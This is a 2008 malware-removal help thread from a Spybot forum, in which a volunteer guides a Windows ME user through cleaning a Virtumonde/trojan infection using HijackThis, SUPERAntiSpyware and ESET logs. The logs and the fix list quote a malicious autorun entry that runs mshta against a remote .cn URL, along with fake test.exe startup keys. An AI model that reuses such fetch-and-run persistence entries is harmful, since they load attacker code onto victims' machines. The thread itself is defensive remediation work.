PDA

View Full Version : Virtumonde and Trojan



AlexA1
2008-11-08, 20:48
I have an old Windows ME system and recently contracted what appears to be a Trojan virus. I installed Spybot SD and it has detected up to 30 isssues including mostly registry changes, but also Virtumonde viruses. When I use the Fix Selected Items button, it usually clears everything the first time (occasionally will leave one unfixed but it fixes after the second scan). Whenever, I re-boot it comes back. When connnected to the interenet, the virus launches toward a random internet address and begins to download various spyware and virus infections and also streams nasty web-sites and pulls in pictures/videos, etc. The system will run ok when not connected - although because it still attempts to stream the internet, it will sometimes lock stating the system is low on resources. I also had PCS Security Shield installed as a virus scan and it picks up Trojan.Win32.BHO virus. Same issue though - it will delete, but then will always launch again upon re-boot. Please advise on what I may be able to do to clean up. FYI, my system restore was not working prior so I have potential restore points prior to the infection.

Sorry... here is the HJT file. This is after I ran Spybot SD and it found 37 entries and was able to delete (fix) all but 3 entries for Virtumondu.Crack. It will usually delete those too if I disconnect from internet and re-scan.

Thanks,

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:35:58 PM, on 11/8/2008
Platform: Windows ME (Win9x 4.90.3000)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\COMMON\BASE\VRSRV.EXE
C:\WINDOWS\SYSTEM\KB918547\KB918547.EXE
C:\WINDOWS\SYSTEM\KB891711\KB891711.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\DEVLDR16.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\RESTORE\STMGR.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\CREATIVE\SBLIVE\AUDIOHQ\AHQTB.EXE
C:\PROGRAM FILES\CREATIVE\SHAREDLL\AHQ\CTMIX32.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\BROTHER\BRMFCMON\BRMFCWND.EXE
C:\PROGRAM FILES\CYBERLINK\POWERDVD\PDVDSERV.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\COMMON\BASE\VRMON.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\PCFIREWALL\VRFWMON.EXE
C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\ANTIVIRUS\HRRES.EXE
C:\PROGRAM FILES\BROTHER\CONTROLCENTER3\BRCCMCTL.EXE
C:\WINDOWS\SYSTEM\BRMFRSMG.EXE
C:\PROGRAM FILES\BROTHER\BRMFCMON\BRMFCMON.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\TEST.EXE
C:\PROGRAM FILES\TREND MICRO\HIJACKTHIS\HIJACKTHIS.EXE
C:\TEST.EXE
C:\WINDOWS\SYSTEM\WBEM\WINMGMT.EXE

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 6.0\READER\ACTIVEX\ACROIEHELPER.DLL
O2 - BHO: IEHelpObj Class - {EC45E3FE-C16D-4F24-9238-D1B49AD74815} - C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\SERVICE\HWEBMAN.DLL
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O2 - BHO: qs Class - {8A555E0E-6240-DD93-198D-45F571D4FD9B} - C:\PROGRAM FILES\ALTCMD\ALTCMD32.DLL
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [PCHealth] C:\WINDOWS\PCHealth\Support\PCHSchd.exe -s
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [Speed racer] C:\Program Files\Creative\PlayCenter\CTSRReg.exe
O4 - HKLM\..\Run: [AudioHQ] C:\Program Files\Creative\SBLive\AudioHQ\AHQTB.EXE
O4 - HKLM\..\Run: [CreativeMixer] C:\Program Files\Creative\Sharedll\AHQ\CTMIX32.EXE /t
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\Updreg.exe
O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
O4 - HKLM\..\Run: [IndexSearch] C:\Program Files\ScanSoft\PaperPort\IndexSearch.exe
O4 - HKLM\..\Run: [BrmfRmPA.exe] C:\WINDOWS\BrmfRmPA.exe -startup
O4 - HKLM\..\Run: [BrMfcWnd] C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe /AUTORUN
O4 - HKLM\..\Run: [SetDefPrt] C:\Program Files\Brother\Brmfl06a\BrStDvPt.exe
O4 - HKLM\..\Run: [xBrotherMeCom] C:\BRME\BrMeCom.exe 5
O4 - HKLM\..\Run: [ControlCenter3] C:\Program Files\Brother\ControlCenter3\brctrcen.exe /autorun
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [VrMon] C:\Program Files\PCSecurityShield\Common\Base\vrmon.exe
O4 - HKLM\..\Run: [vrfwMon] C:\PROGRAM FILES\PCSECURITYSHIELD\SHIELDPRO\PCFIREWALL\VRFWMON.EXE
O4 - HKLM\..\Run: [VrSchedule] C:\Program Files\PCSecurityShield\ShieldPro\AntiVirus\HrRes.exe
O4 - HKLM\..\Run: [UnlockerAssistant] C:\WINDOWS\Desktop\Unlocker\UnlockerAssistant.exe
O4 - HKLM\..\Run: [devldr16.exe] C:\WINDOWS\SYSTEM\devldr16.exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKLM\..\RunServices: [*StateMgr] C:\WINDOWS\System\Restore\StateMgr.exe
O4 - HKLM\..\RunServices: [VrSrv] C:\Program Files\PCSecurityShield\Common\Base\vrsrv.exe
O4 - HKLM\..\RunServices: [KB918547] C:\WINDOWS\SYSTEM\KB918547\KB918547.EXE
O4 - HKLM\..\RunServices: [KB891711] C:\WINDOWS\SYSTEM\KB891711\KB891711.EXE
O4 - HKLM\..\RunOnce: [SpybotDeletingA2912] command /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKLM\..\RunOnce: [SpybotDeletingC4909] cmd /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKCU\..\RunOnce: [SpybotDeletingB4125] command /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKCU\..\RunOnce: [SpybotDeletingD2142] cmd /c del "C:\Program Files\altcmd\altcmd32.dll"
O4 - HKCU\..\Policies\Explorer\Run: [test] mshta.exe http://cd9dxm1qn2yq5n5jnzuj.cn/s_t.php
O4 - HKCU\..\Policies\Explorer\Run: [Msn] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnHost] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnLoad] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnConvert] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnMessendger] c:\test.exe
O4 - HKUS\.DEFAULT\..\RunOnce: [SpybotDeletingB4125] command /c del "C:\Program Files\altcmd\altcmd32.dll" (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [SpybotDeletingD2142] cmd /c del "C:\Program Files\altcmd\altcmd32.dll" (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [test] mshta.exe http://cd9dxm1qn2yq5n5jnzuj.cn/s_t.php (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnLoad] c:\test.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnConvert] c:\test.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnMessendger] c:\test.exe (User 'Default user')
O4 - .DEFAULT Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE (User 'Default user')
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\PROGRA~1\MESSEN~1\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: MSN Messenger Service - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\PROGRA~1\MESSEN~1\MSMSGS.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/scan8/oscan8.cab

--
End of file - 7152 bytes

I last posted my HJT file on 11-08. I haven't received a response. Did I fail to complete something per instructions?

Thanks,
AlexA
------------------

Post here if still waiting for help in the Malware Forum, (AFTER) FOUR days (http://forums.spybot.info/showthread.php?t=1137)

shelf life
2008-11-15, 15:52
hi,


Did I fail to complete something per instructions?
no, most likely its because you are running ME. the preferred tools for cleaning stuff up will not work on ME.
You can try running spybot in safe mode. to reach safe mode you would tap the f8 key during a computer restart, chose the first option from the list safe mode.

superanitspyware does run on ME, will it clean up the machine, cant say. worth a try:

Please download SUPERAntiSpyware Home Edition:

http://www.superantispyware.com/downloadfile.html?productid=SUPERANTISPYWAREFREE

Install it and double-click the icon on your desktop to run it.
It will ask if you want to update the program definitions, click Yes.

On the main screen, under Scan for Harmful Software click Scan your computer.
On the left check C:\Fixed Drive.
On the right, under Complete Scan, choose Perform Complete Scan.
Click Next to start the scan. Please be patient while it scans your computer.
After the scan is complete a summary box will appear. Click OK.
Make sure everything in the white box has a check next to it, then click Next.
It will quarantine what it found and if it asks if you want to reboot, click
Yes.

To retrieve the removal information - please do the following:

* After reboot, double-click the SUPERAntispyware icon on your desktop.
* Click Preferences . Click the Statistics/Logs tab .
* Under Scanner Logs , double-click SUPERAntiSpyware Scan Log .
* It will open in your default text editor (Notepad).
* Please highlight everything , then right-click and choose copy.
* Click close and close again to exit the program.

Now please paste the removal information in your reply.

AlexA1
2008-11-15, 19:21
Thanks Shelf Life...

I ran Spybot SD in safe mode and it old found one tracking entry. Then I rebooted and it started streaming the internet again for nasty sites. I then downloaded and ran SuperAntiSpyware and it found a trojan.downloader, and unclassified trojan and numerous adware trackers. I deleted them, but upon reboot, they are back. Attached is the scanner log from SuperAntiSpyware:

SUPERAntiSpyware Scan Log
http://www.superantispyware.com

Generated 11/15/2008 at 11:56 AM

Application Version : 4.21.1004

Core Rules Database Version : 3639
Trace Rules Database Version: 1622

Scan type : Complete Scan
Total Scan Time : 00:57:10

Memory items scanned : 150
Memory threats detected : 1
Registry items scanned : 2445
Registry threats detected : 5
File items scanned : 4671
File threats detected : 69

Trojan.Downloader-SVCHost/Fake
C:\SVCHOST.EXE
C:\SVCHOST.EXE
[Msn] C:\SVCHOST.EXE
[MsnHost] C:\SVCHOST.EXE
[MsnLoad] C:\SVCHOST.EXE
[MsnConvert] C:\SVCHOST.EXE
[MsnMessendger] C:\SVCHOST.EXE

Adware.Tracking Cookie
C:\WINDOWS\Cookies\anyuser@st[2].txt
C:\WINDOWS\Cookies\anyuser@soloteengirls[1].txt
C:\WINDOWS\Cookies\anyuser@www.xxx69[1].txt
C:\WINDOWS\Cookies\anyuser@yadro[1].txt
C:\WINDOWS\Cookies\anyuser@www.thesextubesite[2].txt
C:\WINDOWS\Cookies\anyuser@adulttubetraffic[1].txt
C:\WINDOWS\Cookies\anyuser@wachovia.112.2o7[1].txt
C:\WINDOWS\Cookies\anyuser@www.nude-bride-sex[2].txt
C:\WINDOWS\Cookies\anyuser@sexandsubmission[1].txt
C:\WINDOWS\Cookies\anyuser@www.freeporntubes[1].txt
C:\WINDOWS\Cookies\anyuser@sweetyteen[1].txt
C:\WINDOWS\Cookies\anyuser@ads.pointroll[1].txt
C:\WINDOWS\Cookies\anyuser@www.teenyounggirls[1].txt
C:\WINDOWS\Cookies\anyuser@stats[2].txt
C:\WINDOWS\Cookies\anyuser@nude-bride-sex[2].txt
C:\WINDOWS\Cookies\anyuser@www.hot-teens-clips[2].txt
C:\WINDOWS\Cookies\anyuser@chokertraffic[2].txt
C:\WINDOWS\Cookies\anyuser@bs.serving-sys[1].txt
C:\WINDOWS\Cookies\anyuser@www.dampteen[1].txt
C:\WINDOWS\Cookies\anyuser@hardsextube[1].txt
C:\WINDOWS\Cookies\anyuser@thesexypics[1].txt
C:\WINDOWS\Cookies\anyuser@tribalfusion[1].txt
C:\WINDOWS\Cookies\anyuser@pornsickle[1].txt
C:\WINDOWS\Cookies\anyuser@www.adult-empire[1].txt
C:\WINDOWS\Cookies\anyuser@click.payserve[1].txt
C:\WINDOWS\Cookies\anyuser@st[9].txt
C:\WINDOWS\Cookies\anyuser@2o7[2].txt
C:\WINDOWS\Cookies\anyuser@hornymatches[1].txt
C:\WINDOWS\Cookies\anyuser@adbrite[1].txt
C:\WINDOWS\Cookies\anyuser@teens-girls[1].txt
C:\WINDOWS\Cookies\anyuser@st[5].txt
C:\WINDOWS\Cookies\anyuser@dev.hardsextube[2].txt
C:\WINDOWS\Cookies\anyuser@teen-mania[2].txt
C:\WINDOWS\Cookies\anyuser@www.rusexvids[2].txt
C:\WINDOWS\Cookies\anyuser@sweetpornogames[2].txt
C:\WINDOWS\Cookies\anyuser@teensmovie[2].txt
C:\WINDOWS\Cookies\anyuser@interclick[1].txt
C:\WINDOWS\Cookies\anyuser@galleries.adult-empire[1].txt
C:\WINDOWS\Cookies\anyuser@www.rusexfoto[1].txt
C:\WINDOWS\Cookies\anyuser@msnportal.112.2o7[1].txt
C:\WINDOWS\Cookies\anyuser@fuckinghotmoms[2].txt
C:\WINDOWS\Cookies\anyuser@tgppornsite[2].txt
C:\WINDOWS\Cookies\anyuser@serving-sys[2].txt
C:\WINDOWS\Cookies\anyuser@nerd3xxx[1].txt
C:\WINDOWS\Cookies\anyuser@trafficmp[1].txt
C:\WINDOWS\Cookies\anyuser@www.thesexypics[1].txt
C:\WINDOWS\Cookies\anyuser@galleries.soloteengirls[2].txt
C:\WINDOWS\Cookies\anyuser@www.virgin-teen-sex[1].txt
c:\WINDOWS\Cookies\anyuser@sweetyteen[2].txt
c:\WINDOWS\Cookies\anyuser@www.virgin-teen-sex[2].txt
c:\WINDOWS\Cookies\anyuser@xxxcounter[1].txt
c:\WINDOWS\Cookies\anyuser@thesextubesite[1].txt
c:\WINDOWS\Cookies\anyuser@sexonshow[1].txt
c:\WINDOWS\Cookies\anyuser@www.teennicki[1].txt
c:\WINDOWS\Cookies\anyuser@chokertraffic[1].txt
c:\WINDOWS\Cookies\anyuser@www.thesextubesite[1].txt
c:\WINDOWS\Cookies\anyuser@porno-movie-galleries[1].txt
c:\WINDOWS\Cookies\anyuser@www.super-teens[2].txt
c:\WINDOWS\Cookies\anyuser@www.porno-movie-galleries[1].txt
c:\WINDOWS\Cookies\anyuser@www.nudefitnessxxx[1].txt
c:\WINDOWS\Cookies\anyuser@live-sex-porn[2].txt
c:\WINDOWS\Cookies\anyuser@www.rusexvids[1].txt
c:\WINDOWS\Cookies\anyuser@fhg.cuteteencheaters[2].txt
c:\WINDOWS\Cookies\anyuser@nudefitnessxxx[2].txt

Trojan.Unclassified-Packed/Suspicious
C:\WINDOWS\SYSTEM\PNGFILTJ.DLL

Trace.Known Threat Sources
c:\WINDOWS\Temporary Internet Files\Content.IE5\CLMZWXUJ\uv_default[1].gif
c:\WINDOWS\Temporary Internet Files\Content.IE5\O92FKHYN\g_default[1].gif
c:\WINDOWS\Temporary Internet Files\Content.IE5\6LSBIX65\track[7].htm


Any help is greatly appreciated.

Thanks,
AlexA

shelf life
2008-11-15, 21:13
hi:

first we will use hjt, then boot directly into safe mode. you might want to copy/paste this into notepad and save it so you can read it in safe mode.


start HJT, click the "Scan" button. check the items below, close any open windows, then click "Fixed checked"

O4 - HKCU\..\Policies\Explorer\Run: [test] mshta.exe http://cd9dxm1qn2yq5n5jnzuj.cn/s_t.php
O4 - HKCU\..\Policies\Explorer\Run: [Msn] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnHost] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnLoad] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnConvert] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnMessendger] c:\test.exe

O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [test] mshta.exe http://cd9dxm1qn2yq5n5jnzuj.cn/s_t.php (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnLoad] c:\test.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnConvert] c:\test.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\Policies\Explorer\Run: [MsnMessendger] c:\test.exe (User 'Default user')

boot computer into safe mode by tapping the f8 key during a restart.
once at the safe mode desktop.

To enable the viewing of Hidden files follow these steps:

1. Close all programs so that you are at your desktop.
2. Double-click on the My Computer icon.
3. Select the Tools menu and click Folder Options.
4. After the new window appears select the View tab.
5. Under the Hidden files and folders section select the radio button labeled Show hidden files and folders.
6. Remove the checkmark from the checkbox labeled Hide file extensions for known file types.
7. Remove the checkmark from the checkbox labeled Hide protected operating system files.
8. Press the Apply button and then the OK button and shutdown My Computer.
9. Now your computer is configured to show all hidden files.

using explorer navigate to your root drive: Local Disk C:/
see if you can spot and delete:
test.exe

navigate to: C:\Program Files and delete a folder named: altcmd


you can also do this:
Click Start>Run then type %temp%
Hit OK. Delete all the files you can.

click Start>Run then type %windir%\temp
hit ok. delete all the files you can

Empty your Temp folders. Go to Start > Run and type:cleanmgr. Windows will scan. When done check these 3 and press *ok* to remove:

Temporary Files
Temporary Internet Files
Recycle Bin

in safe mode run spybot and SAS again then reboot normally and post a new hjt log. does your security (PCsecurity shield) suite contain a antivirus component?

last do a online scan here:
ESET online scanner:

http://www.eset.com/onlinescan/

uses Internet Explorer only
check "YES" to accept terms
click start button
allow the ActiveX component to install
click the start button. the Scanner will update.
check both "Remove found threats" and "Scan unwanted applications"
click scan
when done you can find the scan log at:C:\Program Files\EsetOnlineScanner\log.txt
please copy/paste that log in next reply.

AlexA1
2008-11-16, 05:20
Hello Shelf Life,

I think we made progress. I followed all the instructions in the previous post and here are just a few notes:

Because there was a significant time lapse from when I first posted the HJT log, I saw some other files to fix from this new HJT scan. I hope it was ok that I added a few more files to the fixed list:
On your check list you showed a few test.exe files. These were causing numerous pop-ups with the "Test" banner while the system was running, so they made sense. I had also started to get other pop-ups with a "SVCHOST" banner and in this new HJT scan I saw a few svchost.exe files configured just like the ones in your list. So I checked them also before I clicked "Fixed Checked".

When I booted in safe mode and ran Spybot SD, it found nothing. When I ran SAS, it found a bunch of Adware tracking cookies but nothing else.

Regarding PCSecurity Shield, I thought I had previously uninstalled this program (probably after I ran the first HJT log) because their CS stated that it was basically a spyware program and not an anti-virus program. I am looking for another anti-virus program (contemplating AVG) but I wanted to get my pc clean before I install a new anti-virus program. It does still show in my program files, but it doesn't show as a program to un-install from my control panel, add/remove programs selection.

Here is the new HJT log after running spybot sd and SAS:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:24:54 PM, on 11/15/2008
Platform: Windows ME (Win9x 4.90.3000)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\KB918547\KB918547.EXE
C:\WINDOWS\SYSTEM\KB891711\KB891711.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\DEVLDR16.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\RESTORE\STMGR.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\CREATIVE\SBLIVE\AUDIOHQ\AHQTB.EXE
C:\PROGRAM FILES\CREATIVE\SHAREDLL\AHQ\CTMIX32.EXE
C:\PROGRAM FILES\BROTHER\BRMFCMON\BRMFCWND.EXE
C:\PROGRAM FILES\CYBERLINK\POWERDVD\PDVDSERV.EXE
C:\PROGRAM FILES\BROTHER\CONTROLCENTER3\BRCCMCTL.EXE
C:\WINDOWS\SYSTEM\BRMFRSMG.EXE
C:\PROGRAM FILES\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE
C:\PROGRAM FILES\BROTHER\BRMFCMON\BRMFCMON.EXE
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\PROGRAM FILES\TREND MICRO\HIJACKTHIS\HIJACKTHIS.EXE
C:\WINDOWS\SYSTEM\WBEM\WINMGMT.EXE

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 6.0\READER\ACTIVEX\ACROIEHELPER.DLL
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O2 - BHO: qs Class - {8A555E0E-6240-DD93-198D-45F571D4FD9B} - C:\PROGRAM FILES\ALTCMD\ALTCMD32.DLL (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [PCHealth] C:\WINDOWS\PCHealth\Support\PCHSchd.exe -s
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [Speed racer] C:\Program Files\Creative\PlayCenter\CTSRReg.exe
O4 - HKLM\..\Run: [AudioHQ] C:\Program Files\Creative\SBLive\AudioHQ\AHQTB.EXE
O4 - HKLM\..\Run: [CreativeMixer] C:\Program Files\Creative\Sharedll\AHQ\CTMIX32.EXE /t
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\Updreg.exe
O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
O4 - HKLM\..\Run: [IndexSearch] C:\Program Files\ScanSoft\PaperPort\IndexSearch.exe
O4 - HKLM\..\Run: [BrmfRmPA.exe] C:\WINDOWS\BrmfRmPA.exe -startup
O4 - HKLM\..\Run: [BrMfcWnd] C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe /AUTORUN
O4 - HKLM\..\Run: [SetDefPrt] C:\Program Files\Brother\Brmfl06a\BrStDvPt.exe
O4 - HKLM\..\Run: [xBrotherMeCom] C:\BRME\BrMeCom.exe 5
O4 - HKLM\..\Run: [ControlCenter3] C:\Program Files\Brother\ControlCenter3\brctrcen.exe /autorun
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [UnlockerAssistant] C:\WINDOWS\Desktop\Unlocker\UnlockerAssistant.exe
O4 - HKLM\..\Run: [devldr16.exe] C:\WINDOWS\SYSTEM\devldr16.exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKLM\..\RunServices: [*StateMgr] C:\WINDOWS\System\Restore\StateMgr.exe
O4 - HKLM\..\RunServices: [VrSrv] C:\Program Files\PCSecurityShield\Common\Base\vrsrv.exe
O4 - HKLM\..\RunServices: [KB918547] C:\WINDOWS\SYSTEM\KB918547\KB918547.EXE
O4 - HKLM\..\RunServices: [KB891711] C:\WINDOWS\SYSTEM\KB891711\KB891711.EXE
O4 - HKCU\..\Run: [SUPERAntiSpyware] C:\PROGRAM FILES\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE
O4 - HKUS\.DEFAULT\..\Run: [SUPERAntiSpyware] C:\PROGRAM FILES\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE (User 'Default user')
O4 - .DEFAULT Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE (User 'Default user')
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\PROGRA~1\MESSEN~1\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: MSN Messenger Service - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\PROGRA~1\MESSEN~1\MSMSGS.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/scan8/oscan8.cab
O16 - DPF: {56762DEC-6B0D-4AB4-A8AD-989993B5D08B} (OnlineScanner Control) - http://www.eset.eu/buxus/docs/OnlineScanner.cab
O20 - Winlogon Notify: !SASWinLogon - C:\PROGRAM FILES\SUPERANTISPYWARE\SASWINLO.DLL

--
End of file - 5353 bytes

When I ran the Eset scan, it found some issues and it looks like all of them were in my Windows\Restore folder. Here is the ESET log:
# version=4
# OnlineScanner.ocx=1.0.0.635
# OnlineScannerDLLA.dll=1, 0, 0, 79
# OnlineScannerDLLW.dll=1, 0, 0, 78
# OnlineScannerUninstaller.exe=1, 0, 0, 49
# vers_standard_module=3615 (20081115)
# vers_arch_module=1.064 (20080214)
# vers_adv_heur_module=1.066 (20070917)
# EOSSerial=24f9fa95dcb41a4683e91a73e062774d
# end=finished
# remove_checked=true
# unwanted_checked=true
# utc_time=2008-11-16 02:53:30
# local_time=2008-11-15 09:53:30 (-0500, Eastern Standard Time)
# country="United States"
# osver=4.90.73010104 9x
# scanned=53423
# found=16
# scan_time=578
c:\_RESTORE\TEMP\A0000226.CPY a variant of Win32/Rootkit.Podnuha trojan (unable to clean - deleted (after the next restart)) 6FC2B50BCE14C227E9E8DBFDE7575E30
c:\_RESTORE\TEMP\TEMPJUNK.0 a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\A0000117.CPY a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
